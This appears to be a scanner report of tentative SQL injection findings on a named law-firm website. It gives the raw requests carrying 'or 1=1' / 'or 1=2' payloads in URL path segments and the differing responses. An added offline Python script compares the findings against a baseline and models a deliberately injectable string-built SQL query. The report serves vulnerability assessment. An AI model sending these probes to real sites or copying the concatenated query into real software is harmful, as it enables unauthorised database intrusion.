The REST URL parameter 1 (the scripts path segment) appears to be vulnerable to SQL injection attacks. The payloads 23520338'%20or%201%3d1--%20 and 23520338'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. Both requests received a 200, but with different bodies: the 1=1 response carries the site's main template (menu.css, the carousel scripts), the 1=2 response a different template marked <!--::staticcontent::-->. The requested resource is a static .htm file, so any SQL involved is run by whatever the server does with a path that no longer names an existing file, not by the file itself; confirm by comparing both responses with the unmodified request and with a true/false pair that does not contain the literal 1=1.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts23520338'%20or%201%3d1--%20/DateRange/ipopeng.htm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /scripts23520338'%20or%201%3d2--%20/DateRange/ipopeng.htm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.25. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/DateRange/ipopeng.htm

Issue detail

The REST URL parameter 2 (the DateRange path segment) appears to be vulnerable to SQL injection attacks. The payloads 15465428'%20or%201%3d1--%20 and 15465428'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. Both requests received a 200 with the same pair of differing bodies seen in 1.24: the site's main template for the 1=1 payload, the <!--::staticcontent::--> template for the 1=2 payload. The same caveat applies: the resource is a static .htm file, so the difference comes from the handling of a non-existent path and needs to be confirmed against the unmodified request.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/DateRange15465428'%20or%201%3d1--%20/ipopeng.htm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /scripts/DateRange15465428'%20or%201%3d2--%20/ipopeng.htm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.26. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/DateRange/ipopeng.htm

Issue detail

The REST URL parameter 3 (the ipopeng.htm filename segment) appears to be vulnerable to SQL injection attacks. The payloads 13057657'%20or%201%3d1--%20 and 13057657'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. Both requests received a 200 with the same pair of differing bodies seen in 1.24 and 1.25: the site's main template for the 1=1 payload, the <!--::staticcontent::--> template for the 1=2 payload. The same caveat applies: the resource is a static .htm file, so the difference comes from the handling of a non-existent path and needs to be confirmed against the unmodified request.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/DateRange/ipopeng.htm13057657'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /scripts/DateRange/ipopeng.htm13057657'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...
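
The following script is an added example, not part of the XSS.CX report or of Burp's own check, and nothing in it was run against www.curtis.com. It reproduces the comparison behind findings 1.22 to 1.26 and adds the two checks the Issue detail sections above ask for: the unmodified request as a baseline, and a second true/false pair that does not contain the literal 1=1. Two target models are constructed so it runs offline, both hypothetical: filter_site, a request filter that expires the cookie and redirects whenever the value contains 1=1 (one possible reading of the 302 in 1.22 and 1.23), and lookup_site, a path lookup built by string concatenation over an in-memory SQLite table (one possible reading of the two templates in 1.24 to 1.26). HOME and STATIC are short stand-ins for the two templates, and the 'a'='a' pair is this example's own choice.

```python
import difflib
import re
import sqlite3
from dataclasses import dataclass, field
from typing import Callable, List, Tuple


@dataclass
class Response:
    status: int
    headers: List[Tuple[str, str]] = field(default_factory=list)
    body: str = ""


# A Set-Cookie that wipes a cookie carries an empty value, e.g. the
# "__UTMZ=;expires=Sun, 18-Apr-2010 17:00:42 GMT;path=/" in Response 1 of 1.22.
_WIPE = re.compile(r"^\s*([^=;\s]+)=\s*;")


def wiped_cookies(resp: Response) -> set:
    """Names (lower-cased) of cookies the response expires."""
    names = set()
    for name, value in resp.headers:
        m = _WIPE.match(value)
        if name.lower() == "set-cookie" and m:
            names.add(m.group(1).lower())
    return names


def same(a: Response, b: Response, threshold: float = 0.95) -> bool:
    """Responses agree when status, wiped cookies and body text all match."""
    if a.status != b.status or wiped_cookies(a) != wiped_cookies(b):
        return False
    return difflib.SequenceMatcher(None, a.body, b.body).ratio() >= threshold


def payload_pairs(marker: str) -> List[Tuple[str, str]]:
    """The report's TRUE/FALSE pair, then a rephrased pair without the literal 1=1."""
    return [
        (marker + "' or 1=1-- ", marker + "' or 1=2-- "),
        (marker + "' or 'a'='a'-- ", marker + "' or 'a'='b'-- "),
    ]


def classify(send: Callable[[str], Response], marker: str = "23520338") -> str:
    """Three-way comparison (baseline, TRUE, FALSE) for each payload pair."""
    base = send("")  # the unmodified request, which a TRUE-vs-FALSE check alone never sees
    verdicts = []
    for t_payload, f_payload in payload_pairs(marker):
        t, f = send(t_payload), send(f_payload)
        if same(t, f):
            verdicts.append("none")           # the scanner would not have reported this
        elif same(f, base) and not same(t, base):
            verdicts.append("true-diverges")  # only the always-true condition changed anything
        elif same(t, base) and not same(f, base):
            verdicts.append("false-diverges")
        else:
            verdicts.append("both-diverge")   # TRUE and FALSE both left the baseline behind
    first, second = verdicts
    if first == "none":
        return "no-difference"
    if second == "none":
        return "signature-filter-suspected"   # only the 1=1/1=2 wording triggered a change
    if first == second:
        return "consistent:" + first          # same behaviour under two spellings of the condition
    return "inconclusive"


# --- constructed targets: models so the probe runs offline, not www.curtis.com itself ---

HOME = ("<html><head><link href='scripts/menu.css'/>"
        "<script src='/scripts/carousel/carousel_behavior_min.js'></script></head>"
        "<body>home page</body></html>")           # stand-in for Response 1 of 1.24
STATIC = ("<html><head><!--::staticcontent::--></head>"
          "<body>content page</body></html>")      # stand-in for Response 2 of 1.24


def filter_site(payload: str) -> Response:
    """Model A (hypothetical): no SQL at all; a request filter expires the cookie
    and redirects to / whenever the cookie value contains 1=1."""
    if re.search(r"1\s*=\s*1", payload):
        wipe = "__UTMZ=;expires=Sun, 18-Apr-2010 17:00:42 GMT;path=/"
        return Response(302, [("Set-Cookie", wipe), ("Location", "/")], "")
    return Response(200, [], STATIC)


_db = sqlite3.connect(":memory:")
_db.execute("CREATE TABLE pages (path TEXT, body TEXT)")
_db.execute("INSERT INTO pages VALUES ('/', ?)", (HOME,))


def lookup_site(payload: str) -> Response:
    """Model B (hypothetical): the handler for a non-existent path looks it up with
    string-built SQL, so an always-true condition returns the first row (home page)
    and an always-false one falls through to the static template."""
    path = "/scripts" + payload + "/DateRange/ipopeng.htm"
    sql = "SELECT body FROM pages WHERE path = '" + path + "'"  # the injectable statement
    row = _db.execute(sql).fetchone()
    return Response(200, [], row[0] if row else STATIC)


if __name__ == "__main__":
    for name, site in (("filter_site", filter_site), ("lookup_site", lookup_site)):
        print(name, "->", classify(site))
```

Run stand-alone it prints one verdict per model. "signature-filter-suspected" means only the 1=1 wording changed anything, which is what the cookie findings would look like if a filter rather than a query were reacting. "consistent:true-diverges" means both spellings of an always-true condition moved the response away from the baseline while the always-false ones did not, which is how a WHERE clause the input actually reaches behaves. Neither verdict replaces reading the responses; it decides which findings deserve the manual work first.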

1.27. http://www.curtis.com/sifr3/adobegaramond.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sifr3/adobegaramond.swf

Issue detail

The REST URL parameter 1 (the sifr3 path segment) appears to be vulnerable to SQL injection attacks. The payloads 15403378'%20or%201%3d1--%20 and 15403378'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. As with the static .htm paths in 1.24 to 1.26, the requested resource is a static file (a .swf font for sIFR), so any SQL involved is run by whatever handles a path that no longer names an existing file; the 1=1 response below carries the site's main template.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sifr315403378'%20or%201%3d1--%20/adobegaramond.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:02:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /sifr315403378'%20or%201%3d2--%20/adobegaramond.swf HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=6
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
